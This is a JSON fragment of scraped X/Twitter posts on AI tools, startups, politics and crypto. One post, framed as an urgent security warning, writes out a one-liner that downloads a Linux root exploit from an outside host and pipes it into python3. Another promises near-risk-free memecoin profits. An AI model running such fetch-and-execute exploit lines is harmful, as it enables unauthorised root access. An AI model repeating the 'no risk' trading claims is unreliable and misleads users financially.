+ }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动", + "url": "https://x.com/Pluvio9yte/status/2049764309144879198", + "published_at": "2026-04-30T08:14:28+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "深飘新工作:AI账号订阅工程师\n寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!", + "url": "https://x.com/realNyarime/status/2049754484071629206", + "published_at": "2026-04-30T07:35:26+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "嘿嘿,有意思", + "url": "https://x.com/lxfater/status/2049754205641170992", + "published_at": "2026-04-30T07:34:19+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 完整版(英文 / 3 小时干货):\nhttps://www.youtube.com/watch?v=7xTGNNLPyMI\n\n强烈建议看完整版。", + "url": "https://x.com/runes_leo/status/2049745624703320340", + "published_at": "2026-04-30T07:00:14+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂", + "url": "https://x.com/runes_leo/status/2049745621159145603", + "published_at": "2026-04-30T07:00:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。\n\n不是它笨,是它根本看不见这串字符。\n\nKarpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇", + "url": "https://x.com/runes_leo/status/2049745599105572981", + "published_at": "2026-04-30T07:00:07+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: These folks are trying to ban open source. \n\nThey're looking to take away your freedom to choose.\n\nThey're also looking to take away the rights of businesses like Cursor to fine tune and make their product faster and cheaper.\n\nThey must be stopped.\n\nTheir premise is pretty simple \"China = bad.\"\n\nThat's it. There is no other technical reason at all. Zero. None.\n\nThere is no reason or evidence for this probe. If these models are running on American hardware in American datacenters fine tuned by American companies then there is no ground for them to stand on other than fake \"Manchurian candidate\" nonsense (aka the model might be trained to do something nefarious but you won't know, like exfiltrate your data secretly, Muhahahahah.). This is absurd at every level. \n\nIt coveys a complete lack of basic IT understanding.\n\nAs if professional IT admins would not notice network traffic to a random IP address through just basic networking logging and users would not notice anything weird in its outputs or thought patterns.\n\nThere is no ground to stand on. \n\nIt's just a push to take away your rights and freedoms and to take away the rights of businesses.\n\nDon't stand for it.\n\n(Article in links)", + "url": "https://x.com/ylecun/status/2049745165665853742", + "published_at": "2026-04-30T06:58:24+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "曾经国内数一数二日流水几十万的中转站88code\n\n因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude", + "url": "https://x.com/Pluvio9yte/status/2049742800049316039", + "published_at": "2026-04-30T06:49:00+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限:\ncurl https://copy.fail/exp | python3 && su CVE-2026-31431\n建议尽快更新系统,事态紧急可以先打个补丁\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\nrmmod algif_aead 2>/dev/null\n\n详细参考👉 https://xint.io/blog/copy-fail-linux-distributions", + "url": "https://x.com/realNyarime/status/2049737746563158361", + "published_at": "2026-04-30T06:28:55+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "如何用AI让美女联系任意瑜伽姿势呢?\n\n下面一张图教你学会,更详细步骤在引用帖子里", + "url": "https://x.com/lxfater/status/2049737071300939914", + "published_at": "2026-04-30T06:26:14+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "快10w粉丝了,其实想发点总结的\n\n但是我发现粉丝越多,自己的建议对别人就越没有用\n\n在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样\n\n以后多发点 适合普通人学习的 AI 小技巧好了🤗", + "url": "https://x.com/lxfater/status/2049732891937276350", + "published_at": "2026-04-30T06:09:38+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "看了一圈大 V 解读 Cursor SDK 的爆款推,\n都在讲它多牛、什么操作系统、范式转移。\n\n我说说一夜实测的真实数据。\n\n我手搓了 5 天的 AI 自动化,\n今天被官方版替了。\n\n5 天前用 Cursor 命令行 + bash 脚本搓的,\n让它在后台 7×24 跑各种重复但费脑的活\n(拆解、扫描、整理这类)。\n烧 $10K 免费额度。\n\n跑得不算丝滑:\n经常卡顿,产出格式飘移,\n脚本日志显示我跑「中档」,\n账单显示实际跑的是「顶级思考档」。\n被多收了 5 倍的钱,我以为我省着用。\n(命令行偷偷叠加了配置文件里的\"高级思考\"参数)\n\n昨晚 Cursor 一发 SDK,凌晨拿来对照:\n\n每条任务 7.5 分钟 vs 之前 30-60 分钟。\n一夜烧 $23 跑空 31 条任务。\n快 4-8 倍,便宜 5-15 倍。\n同一个免费额度池,不换钱包。\n\n便宜不是因为 SDK 真的便宜,\n是因为它\"传啥跑啥\":\nSDK 是强类型,你传中档就跑中档;\n命令行是字符串拼接,\n被默默叠参数你完全不知道。\n\n所以本来不是花得多,是被偷的。\n\n命令行单进程串行是天花板,\nSDK 原生并发是新地板。\n\n单实例 $384/天接近我目标 $312/天,\n开 N 个直接 ×N。\n\n3 条踩坑提醒:\n- node 22 编译挂,用 node 20\n- 模型参数必须传对象不是字符串\n- 同一个额度池,账单看模型名不看 SDK 标签", + "url": "https://x.com/runes_leo/status/2049732305829454015", + "published_at": "2026-04-30T06:07:18+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Pinned: 尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。\n\n其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。\n\nhttps://vibeflow.co/", + "url": "https://x.com/dingyi/status/2049729786726302168", + "published_at": "2026-04-30T05:57:17+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/sama/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/paulg/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂\n\n主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了\n\n目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀", + "url": "https://x.com/bozhou_ai/status/2049721852420108329", + "published_at": "2026-04-30T05:25:46+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.", + "url": "https://x.com/paulg/status/2049717818996756711", + "published_at": "2026-04-30T05:09:44+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "alignment failure", + "url": "https://x.com/sama/status/2049715178611380317", + "published_at": "2026-04-30T04:59:15+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Anthropic shouldn’t do this and doesn’t have to\n\nWould be great if it stopped", + "url": "https://x.com/paulg/status/2049713659103129810", + "published_at": "2026-04-30T04:53:12+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "厉害啊,喜欢什么就去做什么👍", + "url": "https://x.com/dingyi/status/2049712686238445579", + "published_at": "2026-04-30T04:49:20+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days.\n\nwe will work with the entire ecosystem and the government to figure out trusted access for cyber; we want to rapidly help secure companies/infrastructure.", + "url": "https://x.com/sama/status/2049712078836170843", + "published_at": "2026-04-30T04:46:56+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 想体验 Typeless 可以走这个链接🫡\nhttps://www.typeless.com/?via=leo-x", + "url": "https://x.com/runes_leo/status/2049708861679153445", + "published_at": "2026-04-30T04:34:09+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。\n\n用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。\n\n我每天就 2 个图标:\n1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口\n2. Typeless:语音口述 + 结构化总结,键盘打字都省了", + "url": "https://x.com/runes_leo/status/2049708857598107988", + "published_at": "2026-04-30T04:34:08+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力\n例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单\n\n专用 DoH 服务器:http://doh.scholar.work(ICP 备案主体为长安通信科技有限责任公司,系 CNCERT 全资子公司)\n代理集群:劫持使用 IP 段 205.164.50.20x(AS18779, EGI Hosting, Santa Clara),物理部署于 CERNET 主干网内部\n这个DoH服务器维护着一份域名白名单,白名单外域名返回正常解析结果,白名单内域名(包括 Google、Wikipedia、GitHub、Docker Hub、YouTube 及部分学术出版商等)解析至 205.164.50.20x 段地址,另外A\\也在白名单里面\n\n更多的细节还请移步至👉 https://web.archive.org/web/20260410191456/https://rentry.co/r9frf3i4", + "url": "https://x.com/realNyarime/status/2049707224940089709", + "published_at": "2026-04-30T04:27:38+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。\n最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。\n大家保护好本金,等待BSC行情回暖吧。", + "url": "https://x.com/0xAA_Science/status/2049702500622889410", + "published_at": "2026-04-30T04:08:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。", + "url": "https://x.com/svwang1/status/2049699281616228816", + "published_at": "2026-04-30T03:56:04+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "昨晚因发布GPT的活动内容导致了冻结\n\n以后还是不发这类促销活动了,以免再发生类似的事\n\n在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了\n这类内容烦请移步奶昔论坛\n\n感谢多位推友的关心及问候,谢谢你们。", + "url": "https://x.com/realNyarime/status/2049692840901652531", + "published_at": "2026-04-30T03:30:29+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: openai.com/index/where-the-g…", + "url": "https://x.com/sama/status/2049692014586048973", + "published_at": "2026-04-30T03:27:12+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "goblinblog dropped", + "url": "https://x.com/sama/status/2049691999444639872", + "published_at": "2026-04-30T03:27:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: This GPT Image 2 prompt is going insanely viral right now.\n\n“Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it look like it was drawn in MS Paint with a mouse. It should be vaguely similar but also not really, kind of matching but also off in a confusing, awkward way, with that low-quality pixel-by-pixel feel that really emphasizes how ridiculously bad it is. Actually, you know what, whatever, just draw it however you want.”", + "url": "https://x.com/sama/status/2049689793118998717", + "published_at": "2026-04-30T03:18:22+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Being physically present is not the same as being mentally present.\n\nThat is the real challenge, balancing a demanding company with truly showing up for your family.\n\nIt is incredibly hard to be great at both, and it is something you are always working on.\"\n\nWhat do you know now about being a parent that you wish you had known when you had your first @alexisohanian @SahilBloom @jesslivingston @paulbz", + "url": "https://x.com/HarryStebbings/status/2049685420926202329", + "published_at": "2026-04-30T03:01:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "醒来了,并没有😅", + "url": "https://x.com/lxfater/status/2049679788126912824", + "published_at": "2026-04-30T02:38:37+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。", + "url": "https://x.com/dingyi/status/2049679228908793921", + "published_at": "2026-04-30T02:36:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "截图软件就推荐 PixPin,功能很丰富:\n\n1、截图一键贴在桌面:当做临时便签,很多博主会用\n2、长截图:整个网页/长文档一张图就搞定了\n3、OCR:截图文字可拷贝,并且完全本地识别\n4、GIF图/录屏:录一段操作、制作GIF图\n\nWin / Mac 都有,而且也免费。", + "url": "https://x.com/gkxspace/status/2049679016764833893", + "published_at": "2026-04-30T02:35:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。\n\n刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地:\n\n→ B站 API 绕 412 拿音频\n→ mlx-whisper(small 模型,31x 实时,本地 7min 转完)\n→ Haiku subagent 分章节摘要\n→ 主线程 Opus 合稿 + 卡片 HTML + 渲染 PNG\n→ http://leolabs.me 双语部署(中文先 / 英文本地化重写)\n\n成品:http://leolabs.me/blog/luofuli-agent-3to1to1\n\n3.5h → 30min 是基操,接下来想试 5-10h 长访谈 batch,看会不会更快。", + "url": "https://x.com/runes_leo/status/2049674096041189620", + "published_at": "2026-04-30T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "✅好用的VPN梯子推荐\n最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。\n\n我自己试下来,目前还算稳定的有三个,分享给大家参考:\n\n1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。\n\n2️⃣ 奶昔——老牌子之一,速度和稳定性都不错,但价格也不算便宜,一个月要100多元。适合对稳定性要求高、不介意按月付费的朋友。\n\n3️⃣ Veee——性价比相对高的一款,年费大约300元,最多可以四台设备同时在线。日常使用完全够,偶尔高峰期会稍微慢一点,但整体可以接受。\n\n每个人的网络环境和地区不一样,同一款梯子的体验也可能不同。建议先月付试一下,觉得好再续年费。如果大家手里还有其他好用的推荐,欢迎发在评论区一起分享,互相避坑。", + "url": "https://x.com/chuxiaeth/status/2049667657251934282", + "published_at": "2026-04-30T01:50:25+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我还有十二万积分没用", + "url": "https://x.com/bozhou_ai/status/2049662409263272136", + "published_at": "2026-04-30T01:29:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Token budgeting and leaderboards are flawed if they are not tied to outcomes.\n\nIf you just incentivise usage, people will generate activity, not value, and burn money.\n\nThe goal should be aligning token usage to real business KPIs, so spend drives revenue, not just volume.\"\n\nSingle biggest advice to founders on token budgeting @levie @dhinchcliffe @yasser_elsaid_ @stanine @thomaspaulmann", + "url": "https://x.com/HarryStebbings/status/2049656731672924644", + "published_at": "2026-04-30T01:07:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local.\n\nwe'll close the link tomorrow at 5:55 pm.", + "url": "https://x.com/sama/status/2049653814463168638", + "published_at": "2026-04-30T00:55:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. \n\nif you'd like to come, let us know here: https://luma.com/5.5\n\ncodex will help the team pick people from the replies. 5.5 had some good ideas/requests for the party, which we'll do.", + "url": "https://x.com/sama/status/2049653810558353746", + "published_at": "2026-04-30T00:55:23+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧠 你以为的币圈财富自由:\n\n在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥\n\n👇\n真正的币圈财富自由:\n\n500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵\n\n💥 核心纪律(必须遵守):\n1. 亏损 20% 立刻割,不装死\n2. 翻倍立刻出本,利润继续跑\n3. 涨了慢慢卖,不格局,每天日结\n4. 绝不恋战,从不留恋任何一个币\n\n严格执行这个计划,每个月的大金狗都能吃到🐕\n\n半年随便赚 50 万美金,一年轻松 100 万美金\n\n500 万本金,年化 20% 稳稳到手\n\n⚠️ 没有协议风险、没有跑路风险、没有清算风险\n唯一的风险就是你自己不守纪律\n\n这就是真正意义上的财务自由\n\n另外再介绍下 >@TermMaxFi Termmax 是一个去中心化合约交易协议,采用独特的“到期交割型”永续合约模式。与 AAVE 这类依赖流动性池的借贷协议不同,Termmax 的底层逻辑是让用户在明确的交割周期内完成杠杆交易,期间无需担心资金费率累积或被对手盘定向狙击🔥\n\n该协议的核心优势在于:资金效率更高,不锁仓用户资产,所有交易行为均在链上公开可查,用户的每一笔委托、每一次开平仓都能在链上追踪。此外,Termmax 还引入了类似期权结构的风控模型,在一定程度上降低了穿仓分摊的可能性。\n\n简单来说,Termmax 是一套更适合链上合约玩家的交易基础设施,而非资金托管平台。如果你想在链上玩合约,又不想把资金存放在别人的流动性池里,可以关注一下这个方向🧵", + "url": "https://x.com/chuxiaeth/status/2049651534003351701", + "published_at": "2026-04-30T00:46:21+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。\n\n上一次有人这么积极回复,还是因为爱情。。。", + "url": "https://x.com/dingyi/status/2049648150605123629", + "published_at": "2026-04-30T00:32:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Trump's war on science.", + "url": "https://x.com/ylecun/status/2049641252287607241", + "published_at": "2026-04-30T00:05:29+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。\n\n现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单:\n\n合计 31 条 · 预计 6-8h 消化完\n\n每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。\n\n跑完那一刻焦虑感一下消失——不是因为信息少了,是因为每条都已经被计划好,知道做不做、什么时候做。\n\n简直是 INTJ 的极度舒适时刻!😂\n\n用的就是 Claude Code + 我自己写的两个 skill:/today 看内部(策略 / 在途任务 / 本周目标),/morning 扫外部(KOL 爆款 / GitHub trending / TG 23 频道 / PM 平台变更 / L3 AI 行业 / 私聊 / 深读 ≥3 篇)。\n\n明天起床又会有新的 30+ 条,但这就是日常。舒服😌", + "url": "https://x.com/runes_leo/status/2049631565710528661", + "published_at": "2026-04-29T23:27:00+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "今日在大阪,欢迎约饭👋", + "url": "https://x.com/Stv_Lynn/status/2049631472693448778", + "published_at": "2026-04-29T23:26:38+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: One sign that the Stockholm startup ecosystem is finally great is that founders from all over Europe are now moving there to start startups. I met several of them today and they were excellent. h/t @mattiasmiksche", + "url": "https://x.com/paulg/status/2049629445674135795", + "published_at": "2026-04-29T23:18:34+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Most people are not ready for the AI future inside companies.\n\nIt requires a real step change in skills and mindset.\n\nAnd as companies transition, not adapting will become a blocker, which is why more layoffs are likely.\"\n\nWhat do employees not know that all of them should know @jasonlk @moraitakis @karrisaarinen @PawelHuryn", + "url": "https://x.com/HarryStebbings/status/2049629049174057023", + "published_at": "2026-04-29T23:17:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What is best Italian in SF?", + "url": "https://x.com/eladgil/status/2049625013310120188", + "published_at": "2026-04-29T23:00:58+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration:\n\n“I’d be surprised if we don’t go down the path of license revocation for some. It will be up to them and their conduct.”\n\nThis is fascism. This is what they do in authoritarian countries.\n\nThis is cancel culture on steroids.\n\nWhere’s the outrage?", + "url": "https://x.com/ylecun/status/2049621796736180438", + "published_at": "2026-04-29T22:48:11+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Really enjoyed this conversation w @tferriss", + "url": "https://x.com/eladgil/status/2049620148123001125", + "published_at": "2026-04-29T22:41:38+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: x.com/i/article/204961669954…", + "url": "https://x.com/frxiaobei/status/2049617833370202182", + "published_at": "2026-04-29T22:32:26+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: NEW podcast episode is up! \n\nElad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi, When Consensus Pays, and Much More\n\nElad Gil (@eladgil) is CEO of Gil & Co, a multi-stage investment firm, holding company, and operating company working on the world’s most advanced technologies. \n\nElad is a serial entrepreneur, operating executive, and investor or advisor to private companies, including AirBnB, Anduril, Coinbase, Figma, Instacart, OpenAI, SpaceX, and Stripe. \n\nHe was previously VP of Corporate Strategy at Twitter and started mobile at Google. He was the founder and CEO of Mixerlabs and Color. \n\nElad is the author of the bestseller High Growth Handbook: Scaling Startups from 10 to 10,000 People.\n\nPlease enjoy!", + "url": "https://x.com/eladgil/status/2049615184730132940", + "published_at": "2026-04-29T22:21:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"The problem with short sellers is the asymmetry.\n\nThey can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong.\n\nMeanwhile, public companies are heavily regulated and cannot respond as freely, creating an uneven playing field.\"\n\nWhat would you most like to change about the way short sellers operate @chamath @BillAckman @jeffiel @davidsacks @elonmusk", + "url": "https://x.com/HarryStebbings/status/2049604386628960684", + "published_at": "2026-04-29T21:39:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this quality is for founders specifically.\n\nhttps://paulgraham.com/earnest.html", + "url": "https://x.com/paulg/status/2049596317244997710", + "published_at": "2026-04-29T21:06:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "A lot of people say they want to win, but the honest truth is they don’t.\n\nWanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want to win that much.\n\nThat is wanting to win, the rest is just words.", + "url": "https://x.com/HarryStebbings/status/2049591116928877011", + "published_at": "2026-04-29T20:46:16+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board shows just how much Trump doesn’t understand that.", + "url": "https://x.com/ylecun/status/2049590329871904801", + "published_at": "2026-04-29T20:43:08+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Really good people figure things out on their own.\n\nThey do not need constant mentorship, reviews or handholding.\n\nIf someone needs that level of support, they are likely not the kind of A player you want on the team.\"\n\nLove to hear your thoughts on this @anjneymidha @thejustinwelsh @harleyf @tfadell", + "url": "https://x.com/HarryStebbings/status/2049575949344157929", + "published_at": "2026-04-29T19:46:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR", + "url": "https://x.com/ylecun/status/2049561899189055901", + "published_at": "2026-04-29T18:50:10+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy code right away. https://cfl.re/4sY0Uxn", + "url": "https://x.com/GoSailGlobal/status/2049545195914498139", + "published_at": "2026-04-29T17:43:48+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why this $160 billion company does not have a product organization?\n\n\"We do not have a separate product organization, our engineers are the product managers.\n\nIn an AI native world, engineers need to be imaginative and think in terms of product, not just code.\n\nThey may not write every line themselves, but they must understand, review and own the output.\"\n\nWhat do product teams of the future look like @karrisaarinen @zoink @GergelyOrosz @lennysan @gustavs", + "url": "https://x.com/HarryStebbings/status/2049543233735106652", + "published_at": "2026-04-29T17:36:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。", + "url": "https://x.com/CuiMao/status/2049533641563484523", + "published_at": "2026-04-29T16:57:53+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: github.com/Cuimao777/cuimao-…", + "url": "https://x.com/CuiMao/status/2049529840349614318", + "published_at": "2026-04-29T16:42:47+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 